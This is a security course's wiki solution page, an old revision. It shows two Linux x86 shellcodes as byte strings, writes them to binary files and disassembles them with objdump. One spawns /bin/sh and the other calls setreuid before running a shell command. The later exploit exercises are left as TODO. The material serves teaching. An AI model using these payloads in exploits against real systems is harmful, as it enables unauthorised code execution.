Security Summer School

User Tools

Site Tools

session:solution:09

This is an old revision of the document!

Table of Contents

Session 09 Solutions

Create and disassemble binary shellcodes

We extract the two shellcode byte strings from the given links (1, 2): 

$ cat 216.print
\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff
$ cat 827.print 
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

and then we use echo to generate two binary shellcode files: 

$ echo -en '\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff' > 216.bin
$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' > 827.bin

Afterwards, we disassemble the binary shellcode files: 

$ objdump -D -b binary -m i386 -M intel 827.bin 

827.bin:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:	31 c0                	xor    eax,eax
   2:	50                   	push   eax
   3:	68 2f 2f 73 68       	push   0x68732f2f
   8:	68 2f 62 69 6e       	push   0x6e69622f
   d:	89 e3                	mov    ebx,esp
   f:	50                   	push   eax
  10:	53                   	push   ebx
  11:	89 e1                	mov    ecx,esp
  13:	b0 0b                	mov    al,0xb
  15:	cd 80                	int    0x80


$ objdump -D -b binary -m i386 -M intel 216.bin 

216.bin:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:	6a 46                	push   0x46
   2:	58                   	pop    eax
   3:	31 db                	xor    ebx,ebx
   5:	31 c9                	xor    ecx,ecx
   7:	cd 80                	int    0x80
   9:	eb 21                	jmp    0x2c
   b:	5f                   	pop    edi
   c:	6a 0b                	push   0xb
   e:	58                   	pop    eax
   f:	99                   	cdq    
  10:	52                   	push   edx
  11:	66 68 2d 63          	pushw  0x632d
  15:	89 e6                	mov    esi,esp
  17:	52                   	push   edx
  18:	68 2f 2f 73 68       	push   0x68732f2f
  1d:	68 2f 62 69 6e       	push   0x6e69622f
  22:	89 e3                	mov    ebx,esp
  24:	52                   	push   edx
  25:	57                   	push   edi
  26:	56                   	push   esi
  27:	53                   	push   ebx
  28:	89 e1                	mov    ecx,esp
  2a:	cd 80                	int    0x80
  2c:	e8 da ff ff ff       	call   0xb

and we compare the resulting assembly source code to the one in the initial links. We find they are identical conforming we did a proper generation and disassembling of the binary shellcode files.

Call Trampoline

TODO

Exploit with Known Buffer Address

TODO

Brute-Forcing the Buffer Address

TODO

NOP Sled

TODO

Environment variables

TODO

session/solution/09.1436392771.txt.gz ยท Last modified: by Razvan Deaconescu